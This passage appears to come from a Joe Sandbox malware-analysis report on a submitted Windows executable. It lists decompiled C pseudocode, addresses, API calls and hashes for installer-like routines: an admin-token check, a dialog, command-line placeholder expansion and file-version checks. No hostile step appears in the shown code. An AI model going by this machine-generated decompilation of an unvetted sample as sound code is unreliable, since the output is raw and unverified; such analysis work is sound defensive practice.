                                                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00401962
                                                                                                                                                                                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00401982
                                                                                                                                                                                                                                      • EqualSid.ADVAPI32(00000004,?), ref: 00401998
                                                                                                                                                                                                                                      • FreeSid.ADVAPI32(?), ref: 004019BA
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 004019C1
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 004019CB
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2168512254-0
                                                                                                                                                                                                                                      • Opcode ID: 25c8c4b33845dc7dc3f0cbb71e639a63448f08ccf4f9069c4bc970a309ce7a0d
                                                                                                                                                                                                                                      • Instruction ID: d7b3e164ed17c304e1cf204044ca5785cbda9c9f90ab47d5cc0a3bc3d2923dbb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 25c8c4b33845dc7dc3f0cbb71e639a63448f08ccf4f9069c4bc970a309ce7a0d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 30313EB1A00209AFDB109FA5DE88EAF7BB8FF44744F10043AE541F61A0D7389915CB6A
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                      			E00403440(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                      				void* _t7;
                                                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                                                      				struct HWND__* _t12;
                                                                                                                                                                                                                                      				int _t22;
                                                                                                                                                                                                                                      				struct HWND__* _t24;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t7 = _a8 - 0x10;
                                                                                                                                                                                                                                      				if(_t7 == 0) {
                                                                                                                                                                                                                                      					EndDialog(_a4, 2);
                                                                                                                                                                                                                                      					L11:
                                                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				_t11 = _t7 - 0x100;
                                                                                                                                                                                                                                      				if(_t11 == 0) {
                                                                                                                                                                                                                                      					_t12 = GetDesktopWindow();
                                                                                                                                                                                                                                      					_t24 = _a4;
                                                                                                                                                                                                                                      					E004043AE(_t24, _t12);
                                                                                                                                                                                                                                      					SetWindowTextA(_t24, "OxZQ");
                                                                                                                                                                                                                                      					SetDlgItemTextA(_t24, 0x838,  *0x409404);
                                                                                                                                                                                                                                      					SetForegroundWindow(_t24);
                                                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				if(_t11 == 1) {
                                                                                                                                                                                                                                      					_t22 = _a12;
                                                                                                                                                                                                                                      					if(_t22 < 6) {
                                                                                                                                                                                                                                      						goto L11;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					if(_t22 <= 7) {
                                                                                                                                                                                                                                      						L8:
                                                                                                                                                                                                                                      						EndDialog(_a4, _t22);
                                                                                                                                                                                                                                      						return 1;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					if(_t22 != 0x839) {
                                                                                                                                                                                                                                      						goto L11;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					 *0x4091dc = 1;
                                                                                                                                                                                                                                      					goto L8;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                                                      			}








                                                                                                                                                                                                                                      0x00403449
                                                                                                                                                                                                                                      0x0040344c
                                                                                                                                                                                                                                      0x004034c8
                                                                                                                                                                                                                                      0x004034ce
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004034d0
                                                                                                                                                                                                                                      0x0040344e
                                                                                                                                                                                                                                      0x00403453
                                                                                                                                                                                                                                      0x0040348a
                                                                                                                                                                                                                                      0x00403490
                                                                                                                                                                                                                                      0x00403497
                                                                                                                                                                                                                                      0x004034a2
                                                                                                                                                                                                                                      0x004034b4
                                                                                                                                                                                                                                      0x004034bb
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004034bb
                                                                                                                                                                                                                                      0x00403458
                                                                                                                                                                                                                                      0x0040345e
                                                                                                                                                                                                                                      0x00403464
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040346c
                                                                                                                                                                                                                                      0x0040347c
                                                                                                                                                                                                                                      0x00403480
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403486
                                                                                                                                                                                                                                      0x00403474
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403476
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403476
                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 00403480
                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 0040348A
                                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,OxZQ), ref: 004034A2
                                                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,00000838), ref: 004034B4
                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 004034BB
                                                                                                                                                                                                                                      • EndDialog.USER32(?,00000002), ref: 004034C8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                                                      • String ID: OxZQ
                                                                                                                                                                                                                                      • API String ID: 852535152-3840506403
                                                                                                                                                                                                                                      • Opcode ID: 6818c9a7edc63714baf802f95ba9d58428312559786b67df64d125fe4b0078e5
                                                                                                                                                                                                                                      • Instruction ID: d61ef69822079b339caa83da3bf2b3d8e5451d5ef1629251797e727a2e77204f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6818c9a7edc63714baf802f95ba9d58428312559786b67df64d125fe4b0078e5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BE01F131260214ABD7565F64CE0C96E3E18EB49702F004032FA46BE6E1CB789F52CBCE
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                                                                                                      			E00402AA5(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                                                      				signed int _t16;
                                                                                                                                                                                                                                      				int _t21;
                                                                                                                                                                                                                                      				char _t32;
                                                                                                                                                                                                                                      				intOrPtr _t34;
                                                                                                                                                                                                                                      				char* _t38;
                                                                                                                                                                                                                                      				char _t42;
                                                                                                                                                                                                                                      				char* _t44;
                                                                                                                                                                                                                                      				CHAR* _t52;
                                                                                                                                                                                                                                      				intOrPtr* _t55;
                                                                                                                                                                                                                                      				CHAR* _t59;
                                                                                                                                                                                                                                      				void* _t62;
                                                                                                                                                                                                                                      				CHAR* _t64;
                                                                                                                                                                                                                                      				CHAR* _t65;
                                                                                                                                                                                                                                      				signed int _t66;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t60 = __edx;
                                                                                                                                                                                                                                      				_t16 =  *0x408004; // 0xf5e26b31
                                                                                                                                                                                                                                      				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                                                      				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                                                      				_t65 = _a4;
                                                                                                                                                                                                                                      				_t44 = __edx;
                                                                                                                                                                                                                                      				_t64 = __ecx;
                                                                                                                                                                                                                                      				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                                                      					GetModuleFileNameA( *0x409a3c,  &_v268, 0x104);
                                                                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                                                                      						_t17 =  *_t64;
                                                                                                                                                                                                                                      						if(_t17 == 0) {
                                                                                                                                                                                                                                      							break;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                                                      						 *_t65 =  *_t64;
                                                                                                                                                                                                                                      						if(_t21 != 0) {
                                                                                                                                                                                                                                      							_t65[1] = _t64[1];
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						if( *_t64 != 0x23) {
                                                                                                                                                                                                                                      							L19:
                                                                                                                                                                                                                                      							_t65 = CharNextA(_t65);
                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                      							_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                      							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                                                      								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                                                      									if( *_t64 == 0x23) {
                                                                                                                                                                                                                                      										goto L19;
                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                      									E004016A0(_t65, E004017E8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                      									_t52 = _t65;
                                                                                                                                                                                                                                      									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                                                      									_t60 = _t14;
                                                                                                                                                                                                                                      									do {
                                                                                                                                                                                                                                      										_t32 =  *_t52;
                                                                                                                                                                                                                                      										_t52 =  &(_t52[1]);
                                                                                                                                                                                                                                      									} while (_t32 != 0);
                                                                                                                                                                                                                                      									goto L17;
                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                      								E00406592( &_v268);
                                                                                                                                                                                                                                      								_t55 =  &_v268;
                                                                                                                                                                                                                                      								_t62 = _t55 + 1;
                                                                                                                                                                                                                                      								do {
                                                                                                                                                                                                                                      									_t34 =  *_t55;
                                                                                                                                                                                                                                      									_t55 = _t55 + 1;
                                                                                                                                                                                                                                      								} while (_t34 != 0);
                                                                                                                                                                                                                                      								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                                                      								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                                                      									 *_t38 = 0;
                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                      								E004016A0(_t65, E004017E8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                      								_t59 = _t65;
                                                                                                                                                                                                                                      								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                                                      								_t60 = _t12;
                                                                                                                                                                                                                                      								do {
                                                                                                                                                                                                                                      									_t42 =  *_t59;
                                                                                                                                                                                                                                      									_t59 =  &(_t59[1]);
                                                                                                                                                                                                                                      								} while (_t42 != 0);
                                                                                                                                                                                                                                      								L17:
                                                                                                                                                                                                                                      								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					 *_t65 = _t17;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				return E00406C80(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                                                      			}






















                                                                                                                                                                                                                                      0x00402aa5
                                                                                                                                                                                                                                      0x00402ab0
                                                                                                                                                                                                                                      0x00402ab5
                                                                                                                                                                                                                                      0x00402ab7
                                                                                                                                                                                                                                      0x00402abc
                                                                                                                                                                                                                                      0x00402abf
                                                                                                                                                                                                                                      0x00402ac2
                                                                                                                                                                                                                                      0x00402ac7
                                                                                                                                                                                                                                      0x00402adf
                                                                                                                                                                                                                                      0x00402bd5
                                                                                                                                                                                                                                      0x00402bd5
                                                                                                                                                                                                                                      0x00402bd9
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00402aeb
                                                                                                                                                                                                                                      0x00402af5
                                                                                                                                                                                                                                      0x00402af9
                                                                                                                                                                                                                                      0x00402afe
                                                                                                                                                                                                                                      0x00402afe
                                                                                                                                                                                                                                      0x00402b04
                                                                                                                                                                                                                                      0x00402bc3
                                                                                                                                                                                                                                      0x00402bca
                                                                                                                                                                                                                                      0x00402b0a
                                                                                                                                                                                                                                      0x00402b11
                                                                                                                                                                                                                                      0x00402b1f
                                                                                                                                                                                                                                      0x00402b92
                                                                                                                                                                                                                                      0x00402bc1
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00402b94
                                                                                                                                                                                                                                      0x00402ba7
                                                                                                                                                                                                                                      0x00402bac
                                                                                                                                                                                                                                      0x00402bae
                                                                                                                                                                                                                                      0x00402bae
                                                                                                                                                                                                                                      0x00402bb1
                                                                                                                                                                                                                                      0x00402bb1
                                                                                                                                                                                                                                      0x00402bb3
                                                                                                                                                                                                                                      0x00402bb4
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00402bb1
                                                                                                                                                                                                                                      0x00402b21
                                                                                                                                                                                                                                      0x00402b27
                                                                                                                                                                                                                                      0x00402b2c
                                                                                                                                                                                                                                      0x00402b32
                                                                                                                                                                                                                                      0x00402b35
                                                                                                                                                                                                                                      0x00402b35
                                                                                                                                                                                                                                      0x00402b37
                                                                                                                                                                                                                                      0x00402b38
                                                                                                                                                                                                                                      0x00402b4e
                                                                                                                                                                                                                                      0x00402b56
                                                                                                                                                                                                                                      0x00402b5d
                                                                                                                                                                                                                                      0x00402b5d
                                                                                                                                                                                                                                      0x00402b73
                                                                                                                                                                                                                                      0x00402b78
                                                                                                                                                                                                                                      0x00402b7a
                                                                                                                                                                                                                                      0x00402b7a
                                                                                                                                                                                                                                      0x00402b7d
                                                                                                                                                                                                                                      0x00402b7d
                                                                                                                                                                                                                                      0x00402b7f
                                                                                                                                                                                                                                      0x00402b80
                                                                                                                                                                                                                                      0x00402bb8
                                                                                                                                                                                                                                      0x00402bba
                                                                                                                                                                                                                                      0x00402bba
                                                                                                                                                                                                                                      0x00402b1f
                                                                                                                                                                                                                                      0x00402bd3
                                                                                                                                                                                                                                      0x00402bd3
                                                                                                                                                                                                                                      0x00402bdf
                                                                                                                                                                                                                                      0x00402bdf
                                                                                                                                                                                                                                      0x00402bef

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00402ADF
                                                                                                                                                                                                                                      • IsDBCSLeadByte.KERNEL32(00000000), ref: 00402AEB
                                                                                                                                                                                                                                      • CharNextA.USER32(?), ref: 00402B0B
                                                                                                                                                                                                                                      • CharUpperA.USER32 ref: 00402B17
                                                                                                                                                                                                                                      • CharPrevA.USER32(?,?), ref: 00402B4E
                                                                                                                                                                                                                                      • CharNextA.USER32(?), ref: 00402BCD
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 571164536-0
                                                                                                                                                                                                                                      • Opcode ID: 8c36abfacbc1e34416cfb5c82f3b02157a88ea808d3fbdda0e7403fcfaea8e96
                                                                                                                                                                                                                                      • Instruction ID: 0d50ec297e4060671e6a9f329bf7bfdff7994a675d55f80890706ff3db8e3df0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c36abfacbc1e34416cfb5c82f3b02157a88ea808d3fbdda0e7403fcfaea8e96
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F84133346042455FDB169F348D58AFE7BB99F46304F1400BBE8C2B72C2DBB85E468B69
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                      			E004028E3(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                                                      				char* _v12;
                                                                                                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                                                                                                      				void* _v20;
                                                                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                                                                      				int _v28;
                                                                                                                                                                                                                                      				char _v32;
                                                                                                                                                                                                                                      				void* _v36;
                                                                                                                                                                                                                                      				int _v40;
                                                                                                                                                                                                                                      				void* _v44;
                                                                                                                                                                                                                                      				intOrPtr _v48;
                                                                                                                                                                                                                                      				intOrPtr _v52;
                                                                                                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                                                                                                      				intOrPtr _v60;
                                                                                                                                                                                                                                      				intOrPtr _v64;
                                                                                                                                                                                                                                      				long _t68;
                                                                                                                                                                                                                                      				void* _t70;
                                                                                                                                                                                                                                      				void* _t73;
                                                                                                                                                                                                                                      				void* _t79;
                                                                                                                                                                                                                                      				void* _t83;
                                                                                                                                                                                                                                      				void* _t87;
                                                                                                                                                                                                                                      				void* _t88;
                                                                                                                                                                                                                                      				intOrPtr _t93;
                                                                                                                                                                                                                                      				intOrPtr _t97;
                                                                                                                                                                                                                                      				intOrPtr _t99;
                                                                                                                                                                                                                                      				int _t101;
                                                                                                                                                                                                                                      				void* _t103;
                                                                                                                                                                                                                                      				void* _t106;
                                                                                                                                                                                                                                      				void* _t109;
                                                                                                                                                                                                                                      				void* _t110;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_v12 = __edx;
                                                                                                                                                                                                                                      				_t99 = __ecx;
                                                                                                                                                                                                                                      				_t106 = 0;
                                                                                                                                                                                                                                      				_v16 = __ecx;
                                                                                                                                                                                                                                      				_t87 = 0;
                                                                                                                                                                                                                                      				_t103 = 0;
                                                                                                                                                                                                                                      				_v20 = 0;
                                                                                                                                                                                                                                      				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                                                      					L19:
                                                                                                                                                                                                                                      					_t106 = 1;
                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                      					_t62 = 0;
                                                                                                                                                                                                                                      					_v8 = 0;
                                                                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                                                                      						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                                                      						if(E00402770(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                                                      							goto L20;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						_t11 =  &_v32; // 0x403926
                                                                                                                                                                                                                                      						_t68 = GetFileVersionInfoSizeA(_v12, _t11);
                                                                                                                                                                                                                                      						_v28 = _t68;
                                                                                                                                                                                                                                      						if(_t68 == 0) {
                                                                                                                                                                                                                                      							_t99 = _v16;
                                                                                                                                                                                                                                      							_t70 = _v8 + _t99;
                                                                                                                                                                                                                                      							_t93 = _v24;
                                                                                                                                                                                                                                      							_t87 = _v20;
                                                                                                                                                                                                                                      							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                                                      								goto L18;
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                      							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                                                      							if(_t103 != 0) {
                                                                                                                                                                                                                                      								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                                                      								_v36 = _t73;
                                                                                                                                                                                                                                      								if(_t73 != 0) {
                                                                                                                                                                                                                                      									_t16 =  &_v32; // 0x403926
                                                                                                                                                                                                                                      									if(GetFileVersionInfoA(_v12,  *_t16, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                                                      										L15:
                                                                                                                                                                                                                                      										GlobalUnlock(_t103);
                                                                                                                                                                                                                                      										_t99 = _v16;
                                                                                                                                                                                                                                      										L18:
                                                                                                                                                                                                                                      										_t87 = _t87 + 1;
                                                                                                                                                                                                                                      										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                                                      										_v20 = _t87;
                                                                                                                                                                                                                                      										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                                                      										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                                                      											continue;
                                                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                                                      											goto L19;
                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                                                      										_t79 = _v44;
                                                                                                                                                                                                                                      										_t88 = _t106;
                                                                                                                                                                                                                                      										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                                                      										_t101 = _v28;
                                                                                                                                                                                                                                      										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                                                      										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                                                      										_t97 = _v48;
                                                                                                                                                                                                                                      										_v36 = _t83;
                                                                                                                                                                                                                                      										_t109 = _t83;
                                                                                                                                                                                                                                      										do {
                                                                                                                                                                                                                                      											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00402A82(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                                                      											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00402A82(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                                                      											_t109 = _t109 + 0x18;
                                                                                                                                                                                                                                      											_t88 = _t88 + 4;
                                                                                                                                                                                                                                      										} while (_t88 < 8);
                                                                                                                                                                                                                                      										_t87 = _v20;
                                                                                                                                                                                                                                      										_t106 = 0;
                                                                                                                                                                                                                                      										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                                                      											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                                                      												GlobalUnlock(_t103);
                                                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                                                      												goto L15;
                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                                                      											goto L15;
                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						goto L20;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				L20:
                                                                                                                                                                                                                                      				 *_a8 = _t87;
                                                                                                                                                                                                                                      				if(_t103 != 0) {
                                                                                                                                                                                                                                      					GlobalFree(_t103);
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				return _t106;
                                                                                                                                                                                                                                      			}

































                                                                                                                                                                                                                                      0x004028ec
                                                                                                                                                                                                                                      0x004028ef
                                                                                                                                                                                                                                      0x004028f2
                                                                                                                                                                                                                                      0x004028f4
                                                                                                                                                                                                                                      0x004028f7
                                                                                                                                                                                                                                      0x004028fa
                                                                                                                                                                                                                                      0x004028fc
                                                                                                                                                                                                                                      0x00402902
                                                                                                                                                                                                                                      0x00402a5d
                                                                                                                                                                                                                                      0x00402a5f
                                                                                                                                                                                                                                      0x00402908
                                                                                                                                                                                                                                      0x00402908
                                                                                                                                                                                                                                      0x0040290a
                                                                                                                                                                                                                                      0x0040290d
                                                                                                                                                                                                                                      0x0040291b
                                                                                                                                                                                                                                      0x00402932
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00402938
                                                                                                                                                                                                                                      0x0040293f
                                                                                                                                                                                                                                      0x00402945
                                                                                                                                                                                                                                      0x0040294a
                                                                                                                                                                                                                                      0x00402a2a
                                                                                                                                                                                                                                      0x00402a2d
                                                                                                                                                                                                                                      0x00402a2f
                                                                                                                                                                                                                                      0x00402a32
                                                                                                                                                                                                                                      0x00402a3c
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00402950
                                                                                                                                                                                                                                      0x00402959
                                                                                                                                                                                                                                      0x0040295d
                                                                                                                                                                                                                                      0x00402964
                                                                                                                                                                                                                                      0x0040296a
                                                                                                                                                                                                                                      0x0040296f
                                                                                                                                                                                                                                      0x00402979
                                                                                                                                                                                                                                      0x00402987
                                                                                                                                                                                                                                      0x00402a1b
                                                                                                                                                                                                                                      0x00402a1c
                                                                                                                                                                                                                                      0x00402a22
                                                                                                                                                                                                                                      0x00402a47
                                                                                                                                                                                                                                      0x00402a4a
                                                                                                                                                                                                                                      0x00402a4b
                                                                                                                                                                                                                                      0x00402a4e
                                                                                                                                                                                                                                      0x00402a51
                                                                                                                                                                                                                                      0x00402a57
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004029ad
                                                                                                                                                                                                                                      0x004029ad
                                                                                                                                                                                                                                      0x004029b0
                                                                                                                                                                                                                                      0x004029b8
                                                                                                                                                                                                                                      0x004029be
                                                                                                                                                                                                                                      0x004029c7
                                                                                                                                                                                                                                      0x004029d0
                                                                                                                                                                                                                                      0x004029d2
                                                                                                                                                                                                                                      0x004029d5
                                                                                                                                                                                                                                      0x004029d8
                                                                                                                                                                                                                                      0x004029da
                                                                                                                                                                                                                                      0x004029e7
                                                                                                                                                                                                                                      0x004029f3
                                                                                                                                                                                                                                      0x004029f7
                                                                                                                                                                                                                                      0x004029fa
                                                                                                                                                                                                                                      0x004029fd
                                                                                                                                                                                                                                      0x00402a02
                                                                                                                                                                                                                                      0x00402a05
                                                                                                                                                                                                                                      0x00402a0a
                                                                                                                                                                                                                                      0x00402a14
                                                                                                                                                                                                                                      0x00402a7a
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00402a0a
                                                                                                                                                                                                                                      0x00402987
                                                                                                                                                                                                                                      0x0040296f
                                                                                                                                                                                                                                      0x0040295d
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040294a
                                                                                                                                                                                                                                      0x0040290d
                                                                                                                                                                                                                                      0x00402a60
                                                                                                                                                                                                                                      0x00402a63
                                                                                                                                                                                                                                      0x00402a67
